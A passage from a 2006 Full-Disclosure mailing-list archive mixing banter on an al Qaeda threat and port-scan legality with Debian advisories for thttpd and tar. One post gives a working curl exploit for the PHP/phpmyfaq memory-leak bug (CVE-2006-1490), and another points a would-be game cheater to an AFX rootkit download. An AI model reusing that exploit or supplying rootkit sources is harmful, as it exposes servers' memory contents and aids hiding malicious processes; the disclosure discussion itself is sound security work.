limitations in the syntax. > The service is free and can be used immediately, no registration is > required. > > Please direct your questions and suggestions to our emails. > > > Regards, > From julio at rfdslabs.com.br Fri Dec 1 14:37:43 2006 From: julio at rfdslabs.com.br (Julio Cesar Fort) Date: Fri, 01 Dec 2006 11:37:43 -0300 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack Message-ID: >From the Reuters article: "WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said." Makes me remind US Bombs' "The World" song ;) Julio Cesar Fort Recife, PE, Brazil www.rfdslabs.com.br - computers, sex, human mind, music and more. From SDALAN04 at smumn.edu Fri Dec 1 14:47:09 2006 From: SDALAN04 at smumn.edu (SDALAN04 at smumn.edu) Date: Fri, 01 Dec 2006 08:47:09 -0600 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack Message-ID: <200612011447096941632096@mail.smumn.edu> Yet you continue to pump this bullshit out just like our American Government. WTF is wrong with you. Nobody but a few people believe this shit. Hopefully this rant will kill this gay-ass thread... Asshole ;) On Friday, December 01, 2006 8:34 AM, Juha-Matti Laurio wrote: >>From the Reuters article: > >Date: Fri, 1 Dec 2006 16:34:06 +0200 (EET) >From: Juha-Matti Laurio >To: bugtraq at securityfocus.com, full-disclosure at lists.grok.org.uk >Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack > >"WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said." > >Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible. > >More at >http://today.reuters.com/News/newsArticle.aspx?type=internetNews&storyID=2006-12-01T061519Z_01_WBT006236_RTRUKOC_0_US-SECURITY-USA-QAEDA.xml&WTmodLoc=InternetNewsHome_C1_%5bFeed%5d-8 > > >SANS Internet Storm Center (ISC) has issued the following Diary entries, >several references included: > >>From ISC director Marcus H. Sachs: >http://isc.sans.org/diary.php?storyid=1900 > >and "US DHS banking alert" entry released earlier by Johannes Ullrich: >http://isc.sans.org/diary.php?storyid=1899 > >- Juha-Matti > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ "Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds" - Einstein "Cuanta estupidez en tan poco cerebro!" From randallm at fidmail.com Fri Dec 1 14:53:45 2006 From: randallm at fidmail.com (Randall M) Date: Fri, 1 Dec 2006 08:53:45 -0600 Subject: [Full-disclosure] Nmap Online In-Reply-To: Message-ID: <20061201145351.0F8DF1236@lists.grok.org.uk> [ [------------------------------ [ [Message: 11 [Date: Fri, 1 Dec 2006 06:48:38 -0500 [From: "Dude VanWinkle" [Subject: Re: [Full-disclosure] Nmap Online [To: "Mike Huber" [Cc: full-disclosure at lists.grok.org.uk [Message-ID: [ [Content-Type: text/plain; charset=ISO-8859-1; format=flowed [ [On 12/1/06, Mike Huber wrote: [> first of all, IANAL, but the TOS seem to cover the basics... [ [> None-the-less, my 8-ball sees litigation in their future. [ [ [portscanning isnt illegal in the states [ [-JP [ [ RandallM From michael.holstein at csuohio.edu Fri Dec 1 15:04:39 2006 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Fri, 01 Dec 2006 10:04:39 -0500 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi> References: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi> Message-ID: <45704487.3060306@csuohio.edu> > Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible. and since when is DHS "credible" itself? and why to people scatter every time their terrorism "mood ring" changes color? I guess they don't realize that servers overheat when wrapped with plastic and duct tape. ~Mike. From michael.holstein at csuohio.edu Fri Dec 1 15:08:17 2006 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Fri, 01 Dec 2006 10:08:17 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <456FF8AA.9B1E.0073.0@alterhighschool.org> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <1bde4ec50612010448y4c0bc8fbi1b9ad62235c58757@mail.gmail.com> <456FF8AA.9B1E.0073.0@alterhighschool.org> Message-ID: <45704561.5080800@csuohio.edu> > ...I wonder if someone probably didn't like all the portscans they got > from it (....thinks of Microsoft) and took it out? > David. Heck .. how to portscan Microsoft has been in the Nmap man page for ages (even in the help you get when you execute it without arguments) .. although it's not in the latest version (it was the -P0 option). It still has Microsoft as an example in usage though : Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 ~Mike. From SDALAN04 at smumn.edu Fri Dec 1 15:15:52 2006 From: SDALAN04 at smumn.edu (SDALAN04 at smumn.edu) Date: Fri, 01 Dec 2006 09:15:52 -0600 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack Message-ID: <200612011515526141632399@mail.smumn.edu> I beg to differ Mike, they are trying to play the same lame ass game that the (Bush) Oil industry, trying to raise interest rates because Osama Bin Laden is going to hack everyones account. Not so smart, I guess I better withdraw all my money American and buy Euros to be safe? On Friday, December 01, 2006 9:04 AM, Michael Holstein wrote: >> Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible. > >Date: Fri, 01 Dec 2006 10:04:39 -0500 >From: Michael Holstein >To: >Subject: Re: [Full-disclosure] Financial firms warned of Qaeda cyber attack > >and since when is DHS "credible" itself? and why to people scatter every >time their terrorism "mood ring" changes color? > >I guess they don't realize that servers overheat when wrapped with >plastic and duct tape. > >~Mike. > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ "Great Spirits Have Always Encountered Violent Opposition From Mediocre Minds" - Einstein "Cuanta estupidez en tan poco cerebro!" From chedder1 at gmail.com Fri Dec 1 15:25:35 2006 From: chedder1 at gmail.com (chedder1 at gmail.com) Date: Fri, 01 Dec 2006 07:25:35 -0800 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi> References: <16640517.344181164983646039.JavaMail.juha-matti.laurio@netti.fi> Message-ID: <20061201152535.GA5758@cheesebox.vc.shawcable.net> Teehee, yeah.. and they are gunna use pen-guns like in james bond, expose iraqs WMDs, an tople in entire western world to... since when do caves even have connections? On Fri, Dec 01, 2006 at 04:34:06PM +0200, Juha-Matti Laurio wrote: > >From the Reuters article: > "WASHINGTON (Reuters) - The U.S. government warned American private financial services on Thursday of an al Qaeda call for a cyber attack against online stock trading and banking Web sites beginning on Friday, a source said." > > Reportedly DHS confirmed an alert had been distributed but said there was no reason to believe the threat was credible. > > More at > http://today.reuters.com/News/newsArticle.aspx?type=internetNews&storyID=2006-12-01T061519Z_01_WBT006236_RTRUKOC_0_US-SECURITY-USA-QAEDA.xml&WTmodLoc=InternetNewsHome_C1_%5bFeed%5d-8 > > > SANS Internet Storm Center (ISC) has issued the following Diary entries, > several references included: > > >From ISC director Marcus H. Sachs: > http://isc.sans.org/diary.php?storyid=1900 > > and "US DHS banking alert" entry released earlier by Johannes Ullrich: > http://isc.sans.org/diary.php?storyid=1899 > > - Juha-Matti > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- _______________________________________________ |hello, my name is | | .__ .___ .___ | | ____ | |__ ____ __| _/__| _/___________ | |_/ ___\| | \_/ __ \ / __ |/ __ |/ __ \_ __ \| |\ \___| Y \ ___// /_/ / /_/ \ ___/| | \/| | \___ >___| /\___ >____ \____ |\___ >__| | | \/ \/ \/ \/ \/ \/ | | http://chedder.hacked.in | |_______________________________________________| "You don't exist. Go away" From skx at debian.org Fri Dec 1 15:36:34 2006 From: skx at debian.org (Steve Kemp) Date: Fri, 1 Dec 2006 15:36:34 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1205-2] New thttpd packages fix insecure temporary file creation Message-ID: <20061201153634.GA20597@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1205-2 security at debian.org http://www.debian.org/security/ Steve Kemp December 1sd, 2006 http://www.debian.org/security/faq - -------------------------------------------------------------------------- Package : thttpd Vulnerability : insecure temporary files Problem-Type : local Debian-specific: yes CVE ID : CVE-2006-4248 Debian Bug : 396277 Marco d'Itri discovered that thttpd, a small, fast and secure webserver, makes use of insecure temporary files when its logfiles are rotated, which might lead to a denial of service through a symlink attack. The original advisory for this issue didn't contain fixed packages for all supported architectures which are corrected in this update. For the stable distribution (sarge) this problem has been fixed in version 2.23beta1-3sarge2 For the unstable distribution (sid) this problem has been fixed in version 2.23beta1-5 We recommend that you upgrade your thttpd package. Upgrade Instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2.dsc Size/MD5 checksum: 614 0f9a3730f341fa0151596a3b9f20764d http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2.diff.gz Size/MD5 checksum: 14313 8545dd3d0f7a2083ecca36e53e72bd6b http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1.orig.tar.gz Size/MD5 checksum: 128712 d3d91f6596f53d5e2b27cea8607d5bba Alpha architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_alpha.deb Size/MD5 checksum: 59270 d4076615e782deb79cabae37733de534 http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_alpha.deb Size/MD5 checksum: 28056 ee6e6ccccb7619755da6478e349d03fd AMD64 architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_amd64.deb Size/MD5 checksum: 56090 59ab35cd4a12c7a010229e793d3d031b http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_amd64.deb Size/MD5 checksum: 26518 76286320653018389937886b1e6b2cfa ARM architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_arm.deb Size/MD5 checksum: 53230 cf8a02a2f0f3bd64522f79111f079642 http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_arm.deb Size/MD5 checksum: 24694 88d75dcab4fa8bca63f48afb04ded258 HP Precision architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_hppa.deb Size/MD5 checksum: 57420 0104f76c6a50be56598ecb7ebb6317a4 http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_hppa.deb Size/MD5 checksum: 26984 46a6908e5e1a0c02bb6b065ed6fab80d Intel IA-32 architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_i386.deb Size/MD5 checksum: 51180 991b1072ebd903b6a9ee316b1bfdc8c6 http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_i386.deb Size/MD5 checksum: 24776 fd3dddb60d160a6245da4c7efd5dcfe4 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_ia64.deb Size/MD5 checksum: 71992 3ae1510acb0dad29743795678058e467 http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_ia64.deb Size/MD5 checksum: 30360 d1b09a54ddb43b6cf5b080e59dbb9792 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_m68k.deb Size/MD5 checksum: 50170 58f820e0cc1ff0921d641fc4f340d4ae http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_m68k.deb Size/MD5 checksum: 24834 fd383afb658a319f594056f14107c6f7 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_mips.deb Size/MD5 checksum: 57060 d42bd66e806d204f9b01559148cbbbea http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_mips.deb Size/MD5 checksum: 31062 b2fedfffe04d03b9d4d7d2316669735e Little endian MIPS architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_mipsel.deb Size/MD5 checksum: 57168 4407a2da69e31159642973201900f64e http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_mipsel.deb Size/MD5 checksum: 31188 3a9282003d6785a05ef91a17c646eb1b PowerPC architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_powerpc.deb Size/MD5 checksum: 53466 24b0524b9944d1bb9e2d8451035be5a0 http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_powerpc.deb Size/MD5 checksum: 25232 8686e26fba64af5040a2484e1c626f06 IBM S/390 architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_s390.deb Size/MD5 checksum: 56264 6b018396fae8f11be8d6dc2ddae99762 http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_s390.deb Size/MD5 checksum: 26344 f7c45e7292b79e9e047982519ed7717b Sun Sparc architecture: http://security.debian.org/pool/updates/main/t/thttpd/thttpd_2.23beta1-3sarge2_sparc.deb Size/MD5 checksum: 53338 3d5315a2b44da8acd151bc714ca45efc http://security.debian.org/pool/updates/main/t/thttpd/thttpd-util_2.23beta1-3sarge2_sparc.deb Size/MD5 checksum: 24796 a64846770af6a96a1ae30d0b02fda299 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFFcEu4wM/Gs81MDZ0RAlC3AKCwfFp3xBERF++ZlJrbrE05r8Z+WgCfdQ0K HeTSA+a1FJmlA36FbBRFj6Q= =3NoA -----END PGP SIGNATURE----- From Valdis.Kletnieks at vt.edu Fri Dec 1 15:53:07 2006 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Fri, 01 Dec 2006 10:53:07 -0500 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: Your message of "Fri, 01 Dec 2006 11:37:43 -0300." References: Message-ID: <200612011553.kB1Fr7KY015326@turing-police.cc.vt.edu> On Fri, 01 Dec 2006 11:37:43 -0300, Julio Cesar Fort said: > >From the Reuters article: > "WASHINGTON (Reuters) - The U.S. government warned American private > financial services on Thursday of an al Qaeda call for a cyber attack > against online stock trading and banking Web sites beginning on Friday, > a source said." We're lucky that al Qaeda didn't call for a bioterrorism attack, like flesh-eating bacteria in the entire US supply of Hanes jockey shorts. ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/72412c95/attachment.bin From tonu at jes.ee Fri Dec 1 14:57:41 2006 From: tonu at jes.ee (Tonu Samuel) Date: Fri, 1 Dec 2006 16:57:41 +0200 Subject: [Full-disclosure] phpmyfaq exploit using PHP bug, CVE-2006-1490 Message-ID: <200612011657.41992.tonu@jes.ee> Long time ago I made unneccesary noise about PHP zeroday. I expected it to be maybe much more dangerous that it appeared to be at end. There was lot of disscussions and one of main consensus was that this bug is not exploitable in real world because noone is using those vulnerable functions. This bug was originally found using phpmyfaq software and wrong assumption was made about wideness of problem. Anyway now half year later it is time to show exploit: curl "http://vulnerablehost/phpmyfaq/admin/index.php" -D - -d "faqusername=%00VERYLONGSTRINGHEREEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" Longer input you provide, longer memory dump you get. Works if PHP is unpatched AND phpmyfaq is older than 1.6.0. Memory dump you get is part of apache memory and often contains sensitive information from other served pages and contexts. To make it clear - this is NOT fault of phpmyfaq people at all. Even more, they made workaround within an hour after I contacted them and urged users to upgrade. Just phpmyfaq appears to be one popular software which is easily findable by Google and this was the software where initially discovery was made. PHP people knew about problem but ignored for long enough to discover it independently from them. T?nu From colin.75 at btinternet.com Fri Dec 1 16:15:55 2006 From: colin.75 at btinternet.com (Colin Copley) Date: Fri, 1 Dec 2006 16:15:55 -0000 Subject: [Full-disclosure] how to hide files, services and process in windows 2k/xp/2k3 box References: 003401c58548$1272f370$6f64a8c0@microsof28e7c5 <456F6FC5.5090802@markbaker.net> Message-ID: <00a401c71563$fb1d5e60$0301a8c0@intuwares.com> "Mark Baker" wrote: > I am trying to find a rootkit to hide processes ad dll's from World of > Warcraft but can't find where to download AFX rootkit. Can you direct > me where to download the rootkit and instructions? The home page seems to be down. You can download AFX 2005 here: www.rootkit.com/vault/therealaphex/AFXRootkit2005.zip They also have a nice selection of alternatives. But why would u want to cheat at Warcraft? Must be Alliance. Cheers Colin From b.hines at comcast.net Fri Dec 1 16:33:56 2006 From: b.hines at comcast.net (b.hines at comcast.net) Date: Fri, 01 Dec 2006 16:33:56 +0000 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack Message-ID: <120120061633.17526.45705974000B3B870000447622007340769C0A020708D20D@comcast.net> Valdis, or worse a Japanese game show I think? http://www.glumbert.com/media/tonguetwister.html -------------- Original message -------------- From: Valdis.Kletnieks at vt.edu > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061201/3e8cccf3/attachment.html From dudevanwinkle at gmail.com Fri Dec 1 16:45:53 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 11:45:53 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86zma7shm8.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> Message-ID: On 01 Dec 2006 08:31:11 -0800, Randal L. Schwartz wrote: > >>>>> "Dude" == Dude VanWinkle writes: > > Dude> On 12/1/06, Mike Huber wrote: > >> first of all, IANAL, but the TOS seem to cover the basics... > Dude> > >> None-the-less, my 8-ball sees litigation in their future. > > > Dude> portscanning isnt illegal in the states > > If it can be argued as an "unauthorized access", it's at least a misdemeanor > in many states, felony in some. And you don't want to be on the wrong end of > that prosecution. > > -- > Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 Its obvious that anyone who hires Stonehenge Consulting services is getting someone who cant read. I never said postscanning was illegal. i said it "isnt illegal". I even provided a link to the case in georgia that helped decide this. -JP From dudevanwinkle at gmail.com Fri Dec 1 16:49:14 2006 From: dudevanwinkle at gmail.com (Dude VanWinkle) Date: Fri, 1 Dec 2006 11:49:14 -0500 Subject: [Full-disclosure] Nmap Online In-Reply-To: <86vekvshj7.fsf@blue.stonehenge.com> References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> <86vekvshj7.fsf@blue.stonehenge.com> Message-ID: On 01 Dec 2006 08:33:00 -0800, Randal L. Schwartz wrote: > >>>>> "Dude" == Dude VanWinkle writes: > > Dude> Here is an example of what is legal vs what isnt: If you scan a > Dude> machine with nmap from one machine, that is not illegal. If you run > Dude> 100,00 nmap scans from a distributed botnet and take down their > Dude> server, thats illegal. > > It's clear you're not a lawyer, and anyone who takes your advice here would be > a fool. But I just wanted to point that out again for the clueless. so if you are disagreeing with one of the above statements, then one of the following must be true in your opinion: you _can_ legally DoS someones server with 100,000 nmap scans or It is illegal to portscan learn to read buddy. -JP From merlyn at stonehenge.com Fri Dec 1 16:31:11 2006 From: merlyn at stonehenge.com (Randal L. Schwartz) Date: 01 Dec 2006 08:31:11 -0800 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> Message-ID: <86zma7shm8.fsf@blue.stonehenge.com> >>>>> "Dude" == Dude VanWinkle writes: Dude> On 12/1/06, Mike Huber wrote: >> first of all, IANAL, but the TOS seem to cover the basics... Dude> >> None-the-less, my 8-ball sees litigation in their future. Dude> portscanning isnt illegal in the states If it can be argued as an "unauthorized access", it's at least a misdemeanor in many states, felony in some. And you don't want to be on the wrong end of that prosecution. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training! From merlyn at stonehenge.com Fri Dec 1 16:33:00 2006 From: merlyn at stonehenge.com (Randal L. Schwartz) Date: 01 Dec 2006 08:33:00 -0800 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <829b2de40612010456n1049c644ie06d1ff292abba7d@mail.gmail.com> Message-ID: <86vekvshj7.fsf@blue.stonehenge.com> >>>>> "Dude" == Dude VanWinkle writes: Dude> Here is an example of what is legal vs what isnt: If you scan a Dude> machine with nmap from one machine, that is not illegal. If you run Dude> 100,00 nmap scans from a distributed botnet and take down their Dude> server, thats illegal. It's clear you're not a lawyer, and anyone who takes your advice here would be a fool. But I just wanted to point that out again for the clueless. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training! From merlyn at stonehenge.com Fri Dec 1 16:54:23 2006 From: merlyn at stonehenge.com (Randal L. Schwartz) Date: 01 Dec 2006 08:54:23 -0800 Subject: [Full-disclosure] Nmap Online In-Reply-To: References: <456BF10D.9080400@matousec.com> <829b2de40611301619r39d24560w16184c16280ab3b1@mail.gmail.com> <86zma7shm8.fsf@blue.stonehenge.com> Message-ID: <86irgvsgjk.fsf@blue.stonehenge.com> >>>>> "Dude" == Dude VanWinkle writes: Dude> Its obvious that anyone who hires Stonehenge Consulting services is Dude> getting someone who cant read. I never said postscanning was illegal. Dude> i said it "isnt illegal". And I'm disagreeing with this. Dude> I even provided a link to the case in Dude> georgia that helped decide this. If there's caselaw in Georgia, that's useful for Georgia, but certainly isn't referencable in the 49 other states. So you can't generalize that. -- Randal L. Schwartz - Stonehenge Consulting Services, Inc. - +1 503 777 0095 Perl/Unix/security consulting, Technical writing, Comedy, etc. etc. See PerlTraining.Stonehenge.com for onsite and open-enrollment Perl training! From chedder1 at gmail.com Fri Dec 1 16:59:30 2006 From: chedder1 at gmail.com (chedder1 at gmail.com) Date: Fri, 01 Dec 2006 08:59:30 -0800 Subject: [Full-disclosure] Financial firms warned of Qaeda cyber attack In-Reply-To: <120120061633.17526.45705974000B3B870000447622007340769C0A020708D20D@comcast.net> References: <120120061633.17526.45705974000B3B870000447622007340769C0A020708D20D@comcast.net> Message-ID: <20061201165930.GA6122@cheesebox.vc.shawcable.net> HOLY SHIT!!! What if they are responsible for japanese gameshows!? On Fri, Dec 01, 2006 at 04:33:56PM +0000, b.hines at comcast.net wrote: > Valdis, > or worse a Japanese game show I think? > > http://www.glumbert.com/media/tonguetwister.html > -------------- Original message -------------- > From: Valdis.Kletnieks at vt.edu > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -- _______________________________________________ |hello, my name is | | .__ .___ .___ | | ____ | |__ ____ __| _/__| _/___________ | |_/ ___\| | \_/ __ \ / __ |/ __ |/ __ \_ __ \| |\ \___| Y \ ___// /_/ / /_/ \ ___/| | \/| | \___ >___| /\___ >____ \____ |\___ >__| | | \/ \/ \/ \/ \/ \/ | | http://chedder.hacked.in | |_______________________________________________| "You don't exist. Go away" From noahm at debian.org Fri Dec 1 16:26:11 2006 From: noahm at debian.org (Noah Meyerhans) Date: Fri, 01 Dec 2006 17:26:11 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1223-1] New tar packages fix arbitrary file overwrite Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1223-1 security at debian.org http://www.debian.org/security/ Noah Meyerhans December 01, 2006 - ------------------------------------------------------------------------ Package : tar Vulnerability : input validation error Problem type : local Debian-specific: no CVE Id(s) : CVE-2006-6097 BugTraq ID : 21235 Debian Bug : 399845 Teemu Salmela discovered a vulnerability in GNU tar that could allow a malicious user to overwrite arbitrary files by inducing the victim to attempt to extract a specially crafted tar file containing a GNUTYPE_NAMES record with a symbolic link. For the stable distribution (sarge), this problem has been fixed in version 1.14-2.3 For the unstable distribution (sid) and the forthcoming stable release (etch), this problem will be fixed in version 1.16-2. We recommend that you upgrade your tar package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 3.1 (stable) - ------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/t/tar/tar_1.14.orig.tar.gz Size/MD5 checksum: 1485633 3094544702b1affa32d969f0b6459663 http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3.diff.gz Size/MD5 checksum: 51004 d6513454cbe12eec5908c2b41253f843 http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3.dsc Size/MD5 checksum: 554 85503d4264d7b39c7969051c3661fa96 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_alpha.deb Size/MD5 checksum: 520736 4b14a87c6e8b4dda327d802eddcf9af7 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_amd64.deb Size/MD5 checksum: 503902 98a8169210eb273252a7997c726c4333 arm architecture (ARM) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_arm.deb Size/MD5 checksum: 500266 49ef1817d4ee1753f66bd37be8f91455 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_hppa.deb Size/MD5 checksum: 517810 5f48745a747ee36c330d97f3bc5cc980 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_i386.deb Size/MD5 checksum: 499560 c764b0894f6c3317a78124177cfed9fe ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_ia64.deb Size/MD5 checksum: 543432 0dc8b4d66a82d05d7b68f2dbee960791 m68k architecture (Motorola Mc680x0) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_m68k.deb Size/MD5 checksum: 489058 381e468152e0a5a37113f412f13d85a7 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_mips.deb Size/MD5 checksum: 520512 29bc4c6133bfeb259175fea45277a647 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_mipsel.deb Size/MD5 checksum: 520258 ed3b0aadf8720c97a1df6334a90efe3c powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_powerpc.deb Size/MD5 checksum: 506908 3a57a912dc159ee20d47ca1591a68619 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_s390.deb Size/MD5 checksum: 511972 79cb92aaeee839c2d82efe743a8cea59 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_sparc.deb Size/MD5 checksum: 499698 d260b9f5db00b12414d6136c63e37202 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) iD8DBQFFcFcbYrVLjBFATsMRAn5hAJ93K1jekZBwWNyIksJkhFoJjcFczwCdHu23 g3FxyAVvV5ABJFj/9m4O8iE= =Es6i -----END PGP SIGNATURE----- From endrazine at gmail.com Fri Dec 1 17:22:53 2006 From: endrazine at gmail.com (endrazine) Date: Fri, 01 Dec 2006 18:22:53 +0100 Subject: [Full-disclosure] Nmap Online In-Reply-To: <457035E5.8090405@matousec.com> References: <01af01c7154f$b518a780$654b5b82@shakuhachi> <457035E5.8090405@matousec.com> Message-ID: <457064ED.7000300@gmail.com> Hi David & list, David 